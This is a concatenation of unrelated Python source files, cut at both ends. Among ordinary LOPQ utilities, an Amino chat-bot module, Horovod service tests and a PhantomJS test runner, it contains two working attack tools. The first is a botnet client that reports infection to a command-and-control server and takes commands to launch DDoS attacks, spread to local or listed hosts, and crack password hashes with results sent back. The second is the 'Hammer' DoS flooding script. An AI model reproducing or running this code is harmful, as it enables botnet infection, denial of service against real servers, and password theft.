}[base_type]
size = os.path.getsize(filename)
f = open(filename, 'rb')
D = np.uint32(struct.unpack('I', f.read(4))[0])
N = size / (4 + D * format_size)
if max_num is None:
max_num = N
f.seek(0)
A = np.zeros((max_num, D), dtype=py_type)
for i in xrange(max_num):
for j in xrange(D + 1):
if j == 0:
np.uint32(struct.unpack(format_code, f.read(4)))
else:
A[i, j - 1] = py_type(struct.unpack(format_code, f.read(format_size))[0])
f.close()
return np.squeeze(A)
def save_xvecs(data, filename, base_type='f'):
"""
A helper to save an ndarray in the binary format as is expected in
load_xvecs above.
"""
import struct
format_code, format_size, py_type = {
'f': ('f', 4, float),
'i': ('I', 4, int),
'b': ('B', 1, float)
}[base_type]
f = open(filename, 'wb')
for d in data:
if hasattr(d, "__len__"):
D = len(d)
f.write(struct.pack('<I', D))
for x in d:
f.write(struct.pack(format_code, x))
else:
D = 1
f.write(struct.pack('<I', D))
f.write(struct.pack(format_code, d))
f.flush()
f.close()
def parmap(f, X, nprocs=multiprocessing.cpu_count()):
"""
Parallel map implementation adapted from http://stackoverflow.com/questions/3288595/multiprocessing-using-pool-map-on-a-function-defined-in-a-class
"""
def func_wrap(f, q_in, q_out):
while True:
i, x = q_in.get()
if i is None:
break
q_out.put((i, f(x)))
q_in = multiprocessing.Queue(1)
q_out = multiprocessing.Queue()
proc = [multiprocessing.Process(target=func_wrap, args=(f, q_in, q_out)) for _ in range(nprocs)]
for p in proc:
p.daemon = True
p.start()
sent = [q_in.put((i, x)) for i, x in enumerate(X)]
[q_in.put((None, None)) for _ in range(nprocs)]
res = [q_out.get() for _ in range(len(sent))]
[p.join() for p in proc]
[p.terminate() for p in proc]
return [x for i, x in sorted(res)]
def get_chunk_ranges(N, num_procs):
"""
A helper that given a number N representing the size of an iterable and the num_procs over which to
divide the data return a list of (start_index, end_index) pairs that divide the data as evenly as possible
into num_procs buckets.
"""
per_thread = N / num_procs
allocation = [per_thread] * num_procs
allocation[0] += N - num_procs * per_thread
data_ranges = [0] + reduce(lambda acc, num: acc + [num + (acc[-1] if len(acc) else 0)], allocation, [])
data_ranges = [(data_ranges[i], data_ranges[i + 1]) for i in range(len(data_ranges) - 1)]
return data_ranges
def compute_codes_parallel(data, model, num_procs=4):
"""
A helper function that parallelizes the computation of LOPQ codes in
a configurable number of processes.
:param ndarray data:
an ndarray of data points
:param LOPQModel model:
a model instance to use to compute codes
:param int num_procs:
the number of processes to spawn
:returns iterable:
an iterable of computed codes in the input order
"""
def compute_partition(data):
return [model.predict(d) for d in data]
N = len(data)
partitions = [data[a:b] for a, b in get_chunk_ranges(N, num_procs)]
codes = parmap(compute_partition, partitions, num_procs)
return chain(*codes)
|
extensions.py
|
from time import sleep as slp
from threading import Thread
# from concurrent.futures import ThreadPoolExecutor
from contextlib import suppress
from unicodedata import normalize
from string import punctuation
from .local_amino import objects
from .Bot import Bot
class TimeOut:
users_dict = {}
def time_user(self, uid, end: int = 5):
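        # Start a cooldown of `end` seconds for this user (if one is not already
        # running); timed_out() returns False until the cooldown has elapsed.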
if uid not in self.users_dict.keys():
self.users_dict[uid] = {"start": 0, "end": end}
Thread(target=self.timer, args=[uid]).start()
def timer(self, uid):
while self.users_dict[uid]["start"] <= self.users_dict[uid]["end"]:
self.users_dict[uid]["start"] += 1
slp(1)
del self.users_dict[uid]
def timed_out(self, uid):
if uid in self.users_dict.keys():
return self.users_dict[uid]["start"] >= self.users_dict[uid]["end"]
return True
class BannedWords:
def filtre_message(self, message, code):
para = normalize('NFD', message).encode(code, 'ignore').decode("utf8").strip().lower()
para = para.translate(str.maketrans("", "", punctuation))
return para
def check_banned_words(self, args):
for word in ("ascii", "utf8"):
with suppress(Exception):
para = self.filtre_message(args.message, word).split()
if para != [""]:
with suppress(Exception):
[args.subClient.delete_message(args.chatId, args.messageId, reason=f"Banned word : {elem}", asStaff=True) for elem in para if elem in args.subClient.banned_words]
class Parameters:
__slots__ = (
"subClient", "chatId", "authorId", "author", "message", "messageId",
"authorIcon", "comId", "replySrc", "replyMsg", "replyId", "info"
)
def __init__(self, data: objects.Event, subClient: Bot):
self.subClient: Bot = subClient
self.chatId: str = data.message.chatId
self.authorId: str = data.message.author.userId
self.author: str = data.message.author.nickname
self.message: str = data.message.content
self.messageId: str = data.message.messageId
self.authorIcon: str = data.message.author.icon
self.comId: str = data.comId
self.replySrc: str = None
self.replyId: str = None
if data.message.extensions and data.message.extensions.get('replyMessage', None) and data.message.extensions['replyMessage'].get('mediaValue', None):
self.replySrc = data.message.extensions['replyMessage']['mediaValue'].replace('_00.', '_hq.')
self.replyId = data.message.extensions['replyMessage']['messageId']
self.replyMsg: str = None
if data.message.extensions and data.message.extensions.get('replyMessage', None) and data.message.extensions['replyMessage'].get('content', None):
self.replyMsg: str = data.message.extensions['replyMessage']['content']
self.replyId: str = data.message.extensions['replyMessage']['messageId']
self.info: objects.Event = data
|
test_service.py
|
# Copyright 2019 Uber Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import io
import queue
import threading
import time
import unittest
import warnings
import pytest
from horovod.runner.common.service.task_service import BasicTaskClient, BasicTaskService
from horovod.runner.common.util import network, secret
from horovod.runner.util.threads import in_thread
from horovod.runner.util.streams import Pipe
class SleepRequest(object):
pass
class TestSleepService(network.BasicService):
def __init__(self, key, duration):
super(TestSleepService, self).__init__('test sleep service', key, nics=None)
self._duration = duration
def _handle(self, req, client_address):
if isinstance(req, SleepRequest):
print('{}: sleeping for client {}'.format(time.time(), client_address))
time.sleep(self._duration)
return network.AckResponse()
return super(TestSleepService, self)._handle(req, client_address)
class TestSleepClient(network.BasicClient):
def __init__(self, service_addresses, key, attempts=1):
super(TestSleepClient, self).__init__('test sleep service',
service_addresses,
key,
verbose=2,
attempts=attempts)
def sleep(self):
self._send(SleepRequest())
class TestStreamService(network.BasicService):
def __init__(self, key, duration):
super(TestStreamService, self).__init__('test stream service', key, nics=None)
self._duration = duration
def _handle(self, req, client_address):
if isinstance(req, SleepRequest):
pipe = Pipe()
def sleep():
time.sleep(self._duration)
pipe.write('slept {}'.format(self._duration))
pipe.close()
in_thread(sleep)
return network.AckStreamResponse(), pipe
return super(TestStreamService, self)._handle(req, client_address)
class TestStreamClient(network.BasicClient):
def __init__(self, service_addresses, key, attempts=1):
super(TestStreamClient, self).__init__('test stream service',
service_addresses,
key,
verbose=2,
attempts=attempts)
def sleep(self, stream):
self._send(SleepRequest(), stream)
class NetworkTests(unittest.TestCase):
"""
Tests for horovod.runner.common.service.
"""
def __init__(self, *args, **kwargs):
super(NetworkTests, self).__init__(*args, **kwargs)
warnings.simplefilter('module')
def test_concurrent_requests_basic(self):
sleep = 2.0
key = secret.make_secret_key()
service = TestSleepService(key, duration=sleep)
try:
client = TestSleepClient(service.addresses(), key, attempts=1)
start = time.time()
threads = list([in_thread(client.sleep, daemon=False) for _ in range(1)])
for thread in threads:
thread.join(sleep + 1.0)
self.assertFalse(thread.is_alive(), 'thread should have terminated by now')
duration = time.time() - start
print('concurrent requests completed in {} seconds'.format(duration))
finally:
service.shutdown()
self.assertGreaterEqual(duration, sleep, 'sleep requests should have been completed')
self.assertLess(duration, sleep + 1.0, 'sleep requests should have been concurrent')
def test_shutdown_during_request_basic(self):
sleep = 2.0
key = secret.make_secret_key()
service = TestSleepService(key, duration=sleep)
try:
client = TestSleepClient(service.addresses(), key, attempts=1)
start = time.time()
threads = list([in_thread(client.sleep, name='request {}'.format(i+1), daemon=False) for i in range(5)])
time.sleep(sleep / 2.0)
finally:
service.shutdown()
duration = time.time() - start
print('shutdown completed in {} seconds'.format(duration))
self.assertGreaterEqual(duration, sleep, 'sleep requests should have been completed')
self.assertLess(duration, sleep + 1.0, 'sleep requests should have been concurrent')
for thread in threads:
thread.join(0.1)
self.assertFalse(thread.is_alive(), 'thread should have terminated by now')
def test_shutdown_during_request_basic_task(self):
result_queue = queue.Queue(1)
def wait_for_exit_code(client, queue):
queue.put(client.wait_for_command_exit_code())
key = secret.make_secret_key()
service_name = 'test-service'
service = BasicTaskService(service_name, 0, key, nics=None, verbose=2)
try:
client = BasicTaskClient(service_name, service.addresses(), key, verbose=2, attempts=1)
thread = threading.Thread(target=wait_for_exit_code, args=(client, result_queue))
start = time.time()
thread.start() # wait for command exit code
client.run_command('sleep 2', {}) # execute command
time.sleep(0.5) # give the thread some time to connect before shutdown
finally:
service.shutdown() # shutdown should wait on request to finish
duration = time.time() - start
self.assertGreaterEqual(duration, 2)
# we cannot call after shutdown
with pytest.raises(Exception, match=r'^(\[[Ee]rrno 104\] Connection reset by peer)'
r'|(\[[Ee]rrno 111\] Connection refused)$'):
client.command_result()
# but still our long running request succeeded
thread.join(1.0)
self.assertFalse(thread.is_alive())
def test_exit_code(self):
"""test non-zero exit code"""
key = secret.make_secret_key()
service_name = 'test-service'
service = BasicTaskService(service_name, 0, key, nics=None, verbose=2)
try:
client = BasicTaskClient(service_name, service.addresses(), key, verbose=2, attempts=1)
client.run_command('false', {})
res = client.wait_for_command_exit_code()
self.assertEqual(1, res)
finally:
service.shutdown()
def test_stream(self):
sleep = 2.0
key = secret.make_secret_key()
service = TestStreamService(key, duration=sleep)
try:
client = TestStreamClient(service.addresses(), key, attempts=1)
start = time.time()
stream = io.StringIO()
client.sleep(stream)
duration = time.time() - start
self.assertEqual(f'slept {sleep}', stream.getvalue())
self.assertGreaterEqual(duration, 2)
finally:
service.shutdown()
|
client.py
|
#!/usr/bin/python
import socket
import threading
import time
import hashlib
import local_network_attack
import attack_list
import DDOSAttack
#confugure
cnc_ip = "your cnc ip"
cnc_port = 8080 #your cnc ip port, default is 8080
executable = "executable to infect with"
##############################################################
global cracking_processes
cracking = False
global id_num
id_num = '0'
global local_attack
local_attack = False
global local_attack_var
local_attack_var = None
global list_attack_var
list_attack_var = None
global ddos_var
ddos_var = None
####### utils: ############################
def get_public_ip(): #gets the public ip
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("ifconfig.me" , 80))
s.sendall("GET / HTTP/1.1\r\nHost: ifconfig.me\r\n\r\n")
data = s.recv(4096)
ip = data.split('\n')
ip = ip[len(ip)-1]
s.close()
return ip
############ bot command functions ####################
def ddos(message,conn,addr): #starts ddos attack
target = message.split(" ")[1]
print("ddos %s" %target)
global ddos_var
if ddos_var:
pass
else:
print("ddos started %s" %target)
ddos_var = DDOSAttack
ddos_var.attack(target)
def stop_ddos(message,conn,addr): #stops ddos attack
if ddos_var:
ddos_var.stop()
print("try ddos stopped")
def send_message(msg,cnc_ip,cnc_port): #sends message to cnc
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((cnc_ip, int(cnc_port)))
sock.send(msg.encode())
sock.close()
def crack(message,conn,addr): #starts hash cracking
with open("rockyou.txt","r") as f:
lines = f.readlines()
index1 = int(message.split(" ")[3])
index2 = int(message.split(" ")[4])
hash_str = message.split(" ")[1]
hash_type = message.split(" ")[2]
print(index1, index2,hash_str,hash_type)
for i in range(index1,index2):
global cracking
if not cracking:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((cnc_ip, cnc_port))
msg = "crack stopped %s" % (hash_str)
sock.send(msg.encode())
sock.close()
return
word = lines[i][:-1]
m = hashlib.new(hash_type)
m.update(word)
if (m.hexdigest() == hash_str):
print("cracked: %s %s on the %s attempt" % (hash_str,word,i))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((cnc_ip, cnc_port))
msg = "cracked %s %s" % (hash_str,word)
sock.send(msg.encode())
sock.close()
return
print("fail")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((cnc_ip, cnc_port))
msg = "crack failed %s" % (hash_str)
sock.send(msg.encode())
sock.close()
return
############### client settings ######################
def infected(port): #sends cnc infection message
global id_num
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((cnc_ip, cnc_port))
msg = "infected: " + str(port)
sock.send(msg.encode())
data = sock.recv(8000)
id_num = data.decode('utf-8').strip('\r\n')
print("my id is: %s" % id_num)
sock.close()
def pong(conn,addr):
conn.send("pong".encode())
conn.close()
def on_message(message,conn,addr): #handels incoming message
global id_num
global cracking
global local_attack
global local_attack_var
global list_attack_var
message = str(message.encode('ascii', 'ignore'))
print("got message",message)
if "scan" in message:
scan(message,conn,addr)
elif 'stop ddos' in message:
stop_ddos(message,conn,addr)
elif 'ddos' in message:
ddos(message,conn,addr)
elif "ping" in message:
pong(conn,addr)
elif "stop crack" in message:
cracking = False
elif "crack" in message:
cracking = True
crack(message,conn,addr)
elif "stop local attack" in message:
local_attack = False
print("try to stop me! %s" % (local_attack_var))
if local_attack_var:
local_attack_var.stop()
local_attack_var = None
elif "local attack" in message:
if local_attack_var:
pass
else:
local_attack = True
local_attack_var = local_network_attack
local_attack_var.scan_and_attack(cnc_ip,cnc_port,executable,False,False,id_num)
elif "stop list attack" in message:
list_attack = False
print("try to stop me! %s" % (list_attack_var))
if list_attack_var:
list_attack_var.stop()
list_attack_var = None
elif "list attack" in message:
if list_attack_var:
pass
else:
list_attack = True
list_attack_var = attack_list
lst = message.split(" ")[2]
if ',' in lst:
lst = lst.split(",")
list_attack_var.attack_list(lst,cnc_ip,cnc_port,executable,False,False,id_num)
else:
new = []
new.append(lst)
list_attack_var.attack_list(new,cnc_ip,cnc_port,executable,False,False,id_num)
def listen(): #starts bot server
serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serv.bind(('0.0.0.0', 0))
serv.listen(5)
port = serv.getsockname()[1]
ip = serv.getsockname()[0]
print("started server on %s %s" % (ip,port))
infected(port)
while True:
conn, addr = serv.accept()
data = conn.recv(1024)
if not data:
break
msg = data.decode('utf-8').strip('\r\n')
x = threading.Thread(target=on_message, args=(msg,conn,addr))
x.setDaemon(True)
x.start()
listen()
|
newfile.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# python 3.3.2+ Hammer Dos Script v.1
# by Can Yalçın
# only for legal purpose
from queue import Queue
from optparse import OptionParser
import time,sys,socket,threading,logging,urllib.request,random
def user_agent():
global uagent
uagent=[]
uagent.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")
uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")
return(uagent)
def my_bots():
global bots
bots=[]
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
return(bots)
def bot_hammering(url):
try:
while True:
req = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent': random.choice(uagent)}))
print("\033[94mbot is hammering...\033[0m")
time.sleep(.1)
except:
time.sleep(.1)
def down_it(item):
try:
while True:
packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent: "+random.choice(uagent)+"\n"+data).encode('utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
if s.sendto( packet, (host, int(port)) ):
s.shutdown(1)
print ("\033[92m",time.ctime(time.time()),"\033[0m \033[94m <--packet sent! hammering--> \033[0m")
else:
s.shutdown(1)
print("\033[91mshut<->down\033[0m")
time.sleep(.1)
except socket.error as e:
print("\033[91mno connection! server maybe down\033[0m")
#print("\033[91m",e,"\033[0m")
time.sleep(.1)
def dos():
while True:
item = q.get()
down_it(item)
q.task_done()
def dos2():
while True:
item=w.get()
bot_hammering(random.choice(bots)+"http://"+host)
w.task_done()
def usage():
print (''' \033[92m Hammer Dos Script v.1 http://www.canyalcin.com/
It is the end user's responsibility to obey all applicable laws.
It is just for server testing script. Your ip is visible. \n
usage : python3 hammer.py [-s] [-p] [-t]
-h : help
-s : server ip
-p : port default 80
-t : turbo default 135 \033[0m''')
sys.exit()
def get_parameters():
global host
global port
global thr
global item
optp = OptionParser(add_help_option=False,epilog="Hammers")
optp.add_option("-q","--quiet", help="set logging to ERROR",action="store_const", dest="loglevel",const=logging.ERROR, default=logging.INFO)
optp.add_option("-s","--server", dest="host",help="attack to server ip -s ip")
optp.add_option("-p","--port",type="int",dest="port",help="-p 80 default 80")
optp.add_option("-t","--turbo",type="int",dest="turbo",help="default 135 -t 135")
optp.add_option("-h","--help",dest="help",action='store_true',help="help you")
opts, args = optp.parse_args()
logging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s')
if opts.help:
usage()
if opts.host is not None:
host = opts.host
else:
usage()
if opts.port is None:
port = 80
else:
port = opts.port
if opts.turbo is None:
thr = 135
else:
thr = opts.turbo
# reading headers
global data
headers = open("headers.txt", "r")
data = headers.read()
headers.close()
#task queue are q,w
q = Queue()
w = Queue()
if __name__ == '__main__':
if len(sys.argv) < 2:
usage()
get_parameters()
print("\033[92m",host," port: ",str(port)," turbo: ",str(thr),"\033[0m")
print("\033[94mPlease wait...\033[0m")
user_agent()
my_bots()
time.sleep(5)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
s.settimeout(1)
except socket.error as e:
print("\033[91mcheck server ip and port\033[0m")
usage()
while True:
for i in range(int(thr)):
t = threading.Thread(target=dos)
t.daemon = True # if thread is exist, it dies
t.start()
t2 = threading.Thread(target=dos2)
t2.daemon = True # if thread is exist, it dies
t2.start()
start = time.time()
#tasking
item = 0
while True:
if (item>1800): # for no memory crash
item=0
time.sleep(.1)
item = item + 1
q.put(item)
w.put(item)
q.join()
w.join()
|
run-tests.py
|
#!/usr/bin/env python
import argparse
import collections
import errno
import glob
import imp
import os
import posixpath
import re
import shlex
import SimpleHTTPServer
import socket
import SocketServer
import ssl
import string
import cStringIO as StringIO
import subprocess
import sys
import threading
import time
import traceback
import urllib
# All files matching one of these glob patterns will be run as tests.
TESTS = [
'basics/*.js',
'module/*/*.js',
'standards/*/*.js',
'regression/*.js',
]
TIMEOUT = 7 # Maximum duration of PhantomJS execution (in seconds).
# This is a backstop; testharness.js imposes a shorter
# timeout. Both can be increased if necessary.
#
# Utilities
#
# FIXME: assumes ANSI/VT100 escape sequences
# properly this should use curses, but that's an awful lot of work
# One of colors 30 ("black" -- usually a dark gray) and 37 ("white" --
# usually a very light gray) will almost certainly be illegible
# against the terminal background, so we provide neither.
# The colorization mode is global because so is sys.stdout.
_COLOR_NONE = {
"_": "", "^": "",
"r": "", "R": "",
"g": "", "G": "",
"y": "", "Y": "",
"b": "", "B": "",
"m": "", "M": "",
"c": "", "C": "",
}
_COLOR_ON = {
"_": "\033[0m", "^": "\033[1m",
"r": "\033[31m", "R": "\033[1;31m",
"g": "\033[32m", "G": "\033[1;32m",
"y": "\033[33m", "Y": "\033[1;33m",
"b": "\033[34m", "B": "\033[1;34m",
"m": "\033[35m", "M": "\033[1;35m",
"c": "\033[36m", "C": "\033[1;36m",
}
_COLOR_BOLD = {
"_": "\033[0m", "^": "\033[1m",
"r": "\033[0m", "R": "\033[1m",
"g": "\033[0m", "G": "\033[1m",
"y": "\033[0m", "Y": "\033[1m",
"b": "\033[0m", "B": "\033[1m",
"m": "\033[0m", "M": "\033[1m",
"c": "\033[0m", "C": "\033[1m",
}
_COLORS = None
def activate_colorization(options):
global _COLORS
if options.color == "always":
_COLORS = _COLOR_ON
elif options.color == "never":
_COLORS = _COLOR_NONE
else:
if sys.stdout.isatty():
try:
n = int(subprocess.check_output(["tput", "colors"]))
if n >= 8:
_COLORS = _COLOR_ON
else:
_COLORS = _COLOR_BOLD
except subprocess.CalledProcessError:
_COLORS = _COLOR_NONE
else:
_COLORS = _COLOR_NONE
def colorize(color, message):
return _COLORS[color] + message + _COLORS["_"]
# create_default_context and SSLContext were only added in 2.7.9,
# which is newer than the python2 that ships with OSX :-(
# The fallback tries to mimic what create_default_context(CLIENT_AUTH)
# does. Security obviously isn't important in itself for a test
# server, but making sure the PJS client can talk to a server
# configured according to modern TLS best practices _is_ important.
# Unfortunately, there is no way to set things like OP_NO_SSL2 or
# OP_CIPHER_SERVER_PREFERENCE prior to 2.7.9.
CIPHERLIST_2_7_9 = (
'ECDH+AESGCM:DH+AESGCM:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:ECDH+HIGH:'
'DH+HIGH:ECDH+3DES:DH+3DES:RSA+AESGCM:RSA+AES:RSA+HIGH:RSA+3DES:!aNULL:'
'!eNULL:!MD5:!DSS:!RC4'
)
def wrap_socket_ssl(sock, base_path):
crtfile = os.path.join(base_path, 'certs/https-snakeoil.crt')
keyfile = os.path.join(base_path, 'certs/https-snakeoil.key')
try:
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
ctx.load_cert_chain(crtfile, keyfile)
return ctx.wrap_socket(sock, server_side=True)
except AttributeError:
return ssl.wrap_socket(sock,
keyfile=keyfile,
certfile=crtfile,
server_side=True,
ciphers=CIPHERLIST_2_7_9)
# This should be in the standard library somewhere, but as far as I
# can tell, it isn't.
class ResponseHookImporter(object):
def __init__(self, www_path):
# All Python response hooks, no matter how deep below www_path,
# are treated as direct children of the fake "test_www" package.
if 'test_www' not in sys.modules:
imp.load_source('test_www', www_path + '/__init__.py')
self.tr = string.maketrans('-./%', '____')
def __call__(self, path):
modname = 'test_www.' + path.translate(self.tr)
try:
return sys.modules[modname]
except KeyError:
return imp.load_source(modname, path)
# This should also be in the standard library somewhere, and
# definitely isn't.
#
# FIXME: This currently involves *three* threads for every process,
# and a fourth if the process takes input. (On Unix, clever use of
# select() might be able to get that down to one, but zero is Hard.
# On Windows, we're hosed. 3.4's asyncio module would make everything
# better, but 3.4 is its own can of worms.)
try:
devnull = subprocess.DEVNULL
except AttributeError:
devnull = os.open(os.devnull, os.O_RDONLY)
def do_call_subprocess(command, verbose, stdin_data, timeout):
def read_thread(linebuf, fp):
while True:
            line = fp.readline()
if not line: break # EOF
line = line.rstrip()
if line:
linebuf.append(line)
if verbose >= 3:
sys.stdout.write(line + '\n')
def write_thread(data, fp):
fp.writelines(data)
fp.close()
def reap_thread(proc, timed_out):
if proc.returncode is None:
proc.terminate()
timed_out[0] = True
class DummyThread:
def start(self): pass
def join(self): pass
if stdin_data:
stdin = subprocess.PIPE
else:
stdin = devnull
proc = subprocess.Popen(command,
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if stdin_data:
sithrd = threading.Thread(target=write_thread,
args=(stdin_data, proc.stdin))
else:
sithrd = DummyThread()
stdout = []
stderr = []
timed_out = [False]
sothrd = threading.Thread(target=read_thread, args=(stdout, proc.stdout))
sethrd = threading.Thread(target=read_thread, args=(stderr, proc.stderr))
rpthrd = threading.Timer(timeout, reap_thread, args=(proc, timed_out))
sithrd.start()
sothrd.start()
sethrd.start()
rpthrd.start()
proc.wait()
if not timed_out[0]: rpthrd.cancel()
sithrd.join()
sothrd.join()
sethrd.join()
rpthrd.join()
if timed_out[0]:
stderr.append("TIMEOUT: Process terminated after {} seconds."
.format(timeout))
if verbose >= 3:
sys.stdout.write(stderr[-1] + "\n")
rc = proc.returncode
if verbose >= 3:
if rc < 0:
sys.stdout.write("## killed by signal {}\n".format(-rc))
else:
sys.stdout.write("## exit {}\n".format(rc))
return proc.returncode, stdout, stderr
#
# HTTP/HTTPS server, presented on localhost to the tests
#
class FileHandler(SimpleHTTPServer.SimpleHTTPRequestHandler, object):
def __init__(self, *args, **kwargs):
self._cached_untranslated_path = None
self._cached_translated_path = None
self.postdata = None
super(FileHandler, self).__init__(*args, **kwargs)
# silent, do not pollute stdout nor stderr.
def log_message(self, format, *args):
return
# accept POSTs, read the postdata and stash it in an instance variable,
# then forward to do_GET; handle_request hooks can vary their behavior
# based on the presence of postdata and/or the command verb.
def do_POST(self):
try:
ln = int(self.headers.get('content-length'))
        except (TypeError, ValueError):
self.send_response(400, 'Bad Request')
self.send_header('Content-Type', 'text/plain')
self.end_headers()
self.wfile.write("No or invalid Content-Length in POST (%r)"
% self.headers.get('content-length'))
return
self.postdata = self.rfile.read(ln)
self.do_GET()
# allow provision of a .py file that will be interpreted to
# produce the response.
def send_head(self):
path = self.translate_path(self.path)
# do not allow direct references to .py(c) files,
# or indirect references to __init__.py
if (path.endswith('.py') or path.endswith('.pyc') or
path.endswith('__init__')):
self.send_error(404, 'File not found')
return None
if os.path.exists(path):
return super(FileHandler, self).send_head()
py = path + '.py'
if os.path.exists(py):
try:
mod = self.get_response_hook(py)
return mod.handle_request(self)
except:
self.send_error(500, 'Internal Server Error in '+py)
raise
self.send_error(404, 'File not found')
return None
# modified version of SimpleHTTPRequestHandler's translate_path
# to resolve the URL relative to the www/ directory
# (e.g. /foo -> test/www/foo)
def translate_path(self, path):
# Cache for efficiency, since our send_head calls this and
# then, in the normal case, the parent class's send_head
# immediately calls it again.
if (self._cached_translated_path is not None and
self._cached_untranslated_path == path):
return self._cached_translated_path
orig_path = path
# Strip query string and/or fragment, if present.
x = path.find('?')
if x != -1: path = path[:x]
x = path.find('#')
if x != -1: path = path[:x]
# Ensure consistent encoding of special characters, then
# lowercase everything so that the tests behave consistently
# whether or not the local filesystem is case-sensitive.
path = urllib.quote(urllib.unquote(path)).lower()
# Prevent access to files outside www/.
# At this point we want specifically POSIX-like treatment of 'path'
# because it is still a URL component and not a filesystem path.
# SimpleHTTPRequestHandler.send_head() expects us to preserve the
# distinction between paths with and without a trailing slash, but
# posixpath.normpath() discards that distinction.
trailing_slash = path.endswith('/')
path = posixpath.normpath(path)
while path.startswith('/'):
path = path[1:]
while path.startswith('../'):
path = path[3:]
# Now resolve the normalized, clamped path relative to the www/
# directory, according to local OS conventions.
path = os.path.normpath(os.path.join(self.www_path, *path.split('/')))
if trailing_slash:
# it must be a '/' even on Windows
path += '/'
self._cached_untranslated_path = orig_path
self._cached_translated_path = path
return path
class TCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
# This is how you are officially supposed to set SO_REUSEADDR per
# https://docs.python.org/2/library/socketserver.html#SocketServer.BaseServer.allow_reuse_address
allow_reuse_address = True
def __init__(self, use_ssl, handler, base_path, signal_error):
SocketServer.TCPServer.__init__(self, ('localhost', 0), handler)
if use_ssl:
self.socket = wrap_socket_ssl(self.socket, base_path)
self._signal_error = signal_error
def handle_error(self, request, client_address):
# Ignore errors which can occur naturally if the client
# disconnects in the middle of a request. EPIPE and
# ECONNRESET *should* be the only such error codes
# (according to the OSX manpage for send()).
_, exval, _ = sys.exc_info()
if getattr(exval, 'errno', None) in (errno.EPIPE, errno.ECONNRESET):
return
# Otherwise, report the error to the test runner.
self._signal_error(sys.exc_info())
class HTTPTestServer(object):
def __init__(self, base_path, signal_error, verbose):
self.httpd = None
self.httpsd = None
self.base_path = base_path
self.www_path = os.path.join(base_path, 'www')
self.signal_error = signal_error
self.verbose = verbose
def __enter__(self):
handler = FileHandler
handler.extensions_map.update({
'.htm': 'text/html',
'.html': 'text/html',
'.css': 'text/css',
'.js': 'application/javascript',
'.json': 'application/json'
})
handler.www_path = self.www_path
handler.get_response_hook = ResponseHookImporter(self.www_path)
self.httpd = TCPServer(False, handler,
self.base_path, self.signal_error)
os.environ['TEST_HTTP_BASE'] = \
'http://localhost:{}/'.format(self.httpd.server_address[1])
httpd_thread = threading.Thread(target=self.httpd.serve_forever)
httpd_thread.daemon = True
httpd_thread.start()
if self.verbose >= 3:
sys.stdout.write("## HTTP server at {}\n".format(
os.environ['TEST_HTTP_BASE']))
self.httpsd = TCPServer(True, handler,
self.base_path, self.signal_error)
os.environ['TEST_HTTPS_BASE'] = \
'https://localhost:{}/'.format(self.httpsd.server_address[1])
httpsd_thread = threading.Thread(target=self.httpsd.serve_forever)
httpsd_thread.daemon = True
httpsd_thread.start()
if self.verbose >= 3:
sys.stdout.write("## HTTPS server at {}\n".format(
os.environ['TEST_HTTPS_BASE']))
return self
def __exit__(self, *dontcare):
self.httpd.shutdown()
del os.environ['TEST_HTTP_BASE']
self.httpsd.shutdown()
del os.environ['TEST_HTTPS_BASE']
#
# Running tests and interpreting their results
#
class TestDetailCode(collections.namedtuple("TestDetailCode", (
"idx", "color", "short_label", "label", "long_label"))):
def __index__(self): return self.idx
def __hash__(self): return self.idx
def __eq__(self, other): return self.idx == other.idx
def __ne__(self, other): return self.idx != other.idx
class T(object):
PASS = TestDetailCode(0, "g", ".", "pass", "passed")
FAIL = TestDetailCode(1, "R", "F", "FAIL", "failed")
XFAIL = TestDetailCode(2, "y", "f", "xfail", "failed as expected")
XPASS = TestDetailCode(3, "Y", "P", "XPASS", "passed unexpectedly")
ERROR = TestDetailCode(4, "R", "E", "ERROR", "had errors")
SKIP = TestDetailCode(5, "m", "s", "skip", "skipped")
MAX = 6
class TestDetail(object):
"""Holds one block of details about a test that failed."""
# types of details:
def __init__(self, message, test_id, detail_type):
